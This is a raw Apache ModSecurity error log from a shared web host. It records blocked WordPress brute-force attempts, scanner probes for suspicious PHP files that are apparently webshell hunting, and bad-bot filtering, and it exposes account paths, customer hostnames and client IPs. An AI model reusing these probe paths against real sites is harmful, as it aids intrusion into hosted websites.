[Tue May 26 16:06:20.316359 2026] [security2:error] [pid 773493:tid 773675] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3o5gy-Vk4jSdqTCQ1EwAAALk"]
[Tue May 26 16:06:20.871784 2026] [security2:error] [pid 773493:tid 773550] [remote 103.11.102.106:47820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV3pJgy-Vk4jSdqTCQ1LQAAuDg"]
[Tue May 26 16:06:21.641630 2026] [security2:error] [pid 773493:tid 773737] [client 104.28.122.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV3pJgy-Vk4jSdqTCQ1HwAAAPc"]
[Tue May 26 16:06:21.645902 2026] [autoindex:error] [pid 773493:tid 773659] [client 192.144.148.122:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://proxuber.com
[Tue May 26 16:06:22.058984 2026] [security2:error] [pid 773493:tid 773632] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3pZgy-Vk4jSdqTCQ1TQAAAI4"]
[Tue May 26 16:06:22.342128 2026] [security2:error] [pid 773493:tid 773710] [client 106.219.85.83:32927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3ppgy-Vk4jSdqTCQ1WAAAANw"]
[Tue May 26 16:06:22.342304 2026] [security2:error] [pid 773493:tid 773710] [client 106.219.85.83:32927] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3ppgy-Vk4jSdqTCQ1WAAAANw"]
[Tue May 26 16:06:22.748987 2026] [security2:error] [pid 773493:tid 773728] [client 103.44.52.196:55130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3ppgy-Vk4jSdqTCQ1agAAAO4"]
[Tue May 26 16:06:22.749147 2026] [security2:error] [pid 773493:tid 773728] [client 103.44.52.196:55130] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3ppgy-Vk4jSdqTCQ1agAAAO4"]
[Tue May 26 16:06:23.011405 2026] [security2:error] [pid 773493:tid 773663] [client 20.104.227.76:41908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/inputs.php"] [unique_id "ahV3p5gy-Vk4jSdqTCQ1awAAAK0"]
[Tue May 26 16:06:24.068067 2026] [security2:error] [pid 773493:tid 773724] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3p5gy-Vk4jSdqTCQ1ggAAAOo"]
[Tue May 26 16:06:24.313529 2026] [security2:error] [pid 773493:tid 773680] [client 62.60.130.233:54615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahV3qJgy-Vk4jSdqTCQ1kAAAAL4"]
[Tue May 26 16:06:24.649722 2026] [security2:error] [pid 773493:tid 773625] [client 62.60.130.233:61321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahV3qJgy-Vk4jSdqTCQ1lwAAAIc"], referer: https://www.linkedin.com/
[Tue May 26 16:06:24.655057 2026] [security2:error] [pid 773493:tid 773736] [client 20.104.227.76:5863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/ioxi-o.php"] [unique_id "ahV3qJgy-Vk4jSdqTCQ1mAAAAPY"]
[Tue May 26 16:06:25.252096 2026] [core:crit] [pid 773493:tid 773687] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:06:25.880902 2026] [security2:error] [pid 773493:tid 773700] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3qZgy-Vk4jSdqTCQ1sAAAANI"]
[Tue May 26 16:06:26.651900 2026] [security2:error] [pid 773493:tid 773603] [remote 103.95.119.103:56398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahV3qpgy-Vk4jSdqTCQ1zwAAum0"]
[Tue May 26 16:06:26.886720 2026] [security2:error] [pid 773493:tid 773587] [remote 103.95.119.103:36942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahV3qpgy-Vk4jSdqTCQ12gAA510"]
[Tue May 26 16:06:28.110617 2026] [security2:error] [pid 773493:tid 773654] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3q5gy-Vk4jSdqTCQ18wAAAKQ"]
[Tue May 26 16:06:28.191553 2026] [security2:error] [pid 773493:tid 773639] [client 20.104.227.76:21944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/function/function.php"] [unique_id "ahV3rJgy-Vk4jSdqTCQ1_QAAAJU"]
[Tue May 26 16:06:29.261448 2026] [security2:error] [pid 773493:tid 773613] [remote 94.76.235.103:52882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahV3rZgy-Vk4jSdqTCQ2EAAA0Xc"]
[Tue May 26 16:06:29.528356 2026] [security2:error] [pid 773493:tid 773630] [client 62.60.130.233:58377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rathnaa.co.in"] [uri "/wp-login.php"] [unique_id "ahV3rZgy-Vk4jSdqTCQ2GwAAAIw"]
[Tue May 26 16:06:29.858072 2026] [security2:error] [pid 773493:tid 773723] [client 62.60.130.233:63925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rathnaa.co.in"] [uri "/wp-login.php"] [unique_id "ahV3rZgy-Vk4jSdqTCQ2JAAAAOk"]
[Tue May 26 16:06:30.252650 2026] [security2:error] [pid 773493:tid 773689] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3rZgy-Vk4jSdqTCQ2IwAAAMc"]
[Tue May 26 16:06:32.319527 2026] [security2:error] [pid 773493:tid 773729] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3r5gy-Vk4jSdqTCQ2VgAAAO8"]
[Tue May 26 16:06:32.519619 2026] [security2:error] [pid 773493:tid 773523] [remote 178.104.90.233:49422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahV3sJgy-Vk4jSdqTCQ2YgAA6R0"]
[Tue May 26 16:06:32.881257 2026] [security2:error] [pid 773493:tid 773668] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahV3sJgy-Vk4jSdqTCQ2ZwAAALI"]
[Tue May 26 16:06:32.900081 2026] [security2:error] [pid 773493:tid 773742] [client 106.219.85.83:23279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3sJgy-Vk4jSdqTCQ2dgAAAPw"]
[Tue May 26 16:06:32.900173 2026] [security2:error] [pid 773493:tid 773742] [client 106.219.85.83:23279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3sJgy-Vk4jSdqTCQ2dgAAAPw"]
[Tue May 26 16:06:34.227849 2026] [security2:error] [pid 773493:tid 773647] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3sZgy-Vk4jSdqTCQ2kQAAAJ0"]
[Tue May 26 16:06:35.036435 2026] [security2:error] [pid 773493:tid 773689] [client 103.44.52.196:60030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3spgy-Vk4jSdqTCQ2tQAAAMc"]
[Tue May 26 16:06:35.036645 2026] [security2:error] [pid 773493:tid 773689] [client 103.44.52.196:60030] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3spgy-Vk4jSdqTCQ2tQAAAMc"]
[Tue May 26 16:06:35.246161 2026] [security2:error] [pid 773493:tid 773627] [client 94.31.92.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3spgy-Vk4jSdqTCQ2tAAAAIk"]
[Tue May 26 16:06:35.305368 2026] [security2:error] [pid 773493:tid 773659] [client 114.119.133.194:28955] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV3s5gy-Vk4jSdqTCQ2vQAAAKk"], referer: http://haddingtonwines.com/cart?remove_item=7109af321d970c64a0154000a60e65c8
[Tue May 26 16:06:36.363430 2026] [security2:error] [pid 773493:tid 773713] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3s5gy-Vk4jSdqTCQ20QAAAN8"]
[Tue May 26 16:06:36.502392 2026] [security2:error] [pid 773493:tid 773750] [client 20.104.227.76:41890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/rip.php"] [unique_id "ahV3tJgy-Vk4jSdqTCQ24gAAAQQ"]
[Tue May 26 16:06:38.543301 2026] [security2:error] [pid 773493:tid 773721] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3tpgy-Vk4jSdqTCQ3EQAAAOc"]
[Tue May 26 16:06:40.590594 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3uJgy-Vk4jSdqTCQ3VgAAAMY"]
[Tue May 26 16:06:40.591385 2026] [security2:error] [pid 773493:tid 773693] [client 62.244.225.226:11213] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV3uJgy-Vk4jSdqTCQ3WgAAAMs"]
[Tue May 26 16:06:42.093545 2026] [security2:error] [pid 773493:tid 773646] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3uZgy-Vk4jSdqTCQ3egAAAJw"]
[Tue May 26 16:06:43.546203 2026] [security2:error] [pid 773493:tid 773718] [client 106.219.85.83:31063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3u5gy-Vk4jSdqTCQ3qwAAAOQ"]
[Tue May 26 16:06:43.546315 2026] [security2:error] [pid 773493:tid 773718] [client 106.219.85.83:31063] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3u5gy-Vk4jSdqTCQ3qwAAAOQ"]
[Tue May 26 16:06:44.037037 2026] [security2:error] [pid 773493:tid 773736] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3u5gy-Vk4jSdqTCQ3sQAAAPY"]
[Tue May 26 16:06:44.719414 2026] [security2:error] [pid 773493:tid 773711] [client 20.104.227.76:5332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/admin.php"] [unique_id "ahV3vJgy-Vk4jSdqTCQ33QAAAN0"]
[Tue May 26 16:06:44.732094 2026] [security2:error] [pid 773493:tid 773651] [client 103.44.52.196:50610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3vJgy-Vk4jSdqTCQ33gAAAKE"]
[Tue May 26 16:06:44.732239 2026] [security2:error] [pid 773493:tid 773651] [client 103.44.52.196:50610] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3vJgy-Vk4jSdqTCQ33gAAAKE"]
[Tue May 26 16:06:46.599895 2026] [security2:error] [pid 773493:tid 773726] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3vpgy-Vk4jSdqTCQ4EQAAAOw"]
[Tue May 26 16:06:47.832168 2026] [security2:error] [pid 773493:tid 773695] [client 109.70.100.11:60442] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "poonawallatennisacademy.com"] [uri "/wp-content/plugins/img-mouseover/readme.txt"] [unique_id "ahV3v5gy-Vk4jSdqTCQ4SgAAAM0"]
[Tue May 26 16:06:48.685180 2026] [security2:error] [pid 773493:tid 773643] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3wJgy-Vk4jSdqTCQ4YgAAAJk"]
[Tue May 26 16:06:48.823249 2026] [security2:error] [pid 773493:tid 773598] [remote 5.39.1.244:63064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "aeromodellingconsultants.com"] [uri "/robots.txt"] [unique_id "ahV3wJgy-Vk4jSdqTCQ4bQAAv2g"]
[Tue May 26 16:06:48.823504 2026] [security2:error] [pid 773493:tid 773681] [client 5.39.1.244:63064] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "aeromodellingconsultants.com"] [uri "/robots.txt"] [unique_id "ahV3wJgy-Vk4jSdqTCQ4bQAAv2g"]
[Tue May 26 16:06:49.996597 2026] [security2:error] [pid 773493:tid 773694] [client 66.249.93.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV3wZgy-Vk4jSdqTCQ4fAAAAMw"]
[Tue May 26 16:06:50.283795 2026] [security2:error] [pid 773493:tid 773601] [remote 15.235.27.84:33804] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "aeromodellingconsultants.com"] [uri "/"] [unique_id "ahV3wpgy-Vk4jSdqTCQ4lQAAy2s"]
[Tue May 26 16:06:50.284014 2026] [security2:error] [pid 773493:tid 773693] [client 15.235.27.84:33804] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "aeromodellingconsultants.com"] [uri "/"] [unique_id "ahV3wpgy-Vk4jSdqTCQ4lQAAy2s"]
[Tue May 26 16:06:50.733126 2026] [security2:error] [pid 773493:tid 773653] [client 74.7.241.174:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahV3wJgy-Vk4jSdqTCQ4XAAAAKM"]
[Tue May 26 16:06:50.734112 2026] [security2:error] [pid 773493:tid 773674] [client 74.7.241.174:51478] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahV3wJgy-Vk4jSdqTCQ4WgAAuE4"]
[Tue May 26 16:06:50.759335 2026] [security2:error] [pid 773493:tid 773625] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3wpgy-Vk4jSdqTCQ4mAAAAIc"]
[Tue May 26 16:06:52.730853 2026] [security2:error] [pid 773493:tid 773699] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3xJgy-Vk4jSdqTCQ4zAAAANE"]
[Tue May 26 16:06:54.251307 2026] [security2:error] [pid 773493:tid 773737] [client 106.219.85.83:32454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3xpgy-Vk4jSdqTCQ5BwAAAPc"]
[Tue May 26 16:06:54.251521 2026] [security2:error] [pid 773493:tid 773737] [client 106.219.85.83:32454] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV3xpgy-Vk4jSdqTCQ5BwAAAPc"]
[Tue May 26 16:06:54.259401 2026] [security2:error] [pid 773493:tid 773637] [client 103.44.52.196:37392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3xpgy-Vk4jSdqTCQ5CAAAAJM"]
[Tue May 26 16:06:54.259546 2026] [security2:error] [pid 773493:tid 773637] [client 103.44.52.196:37392] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV3xpgy-Vk4jSdqTCQ5CAAAAJM"]
[Tue May 26 16:06:54.398140 2026] [security2:error] [pid 773493:tid 773671] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3xZgy-Vk4jSdqTCQ5AAAAALU"]
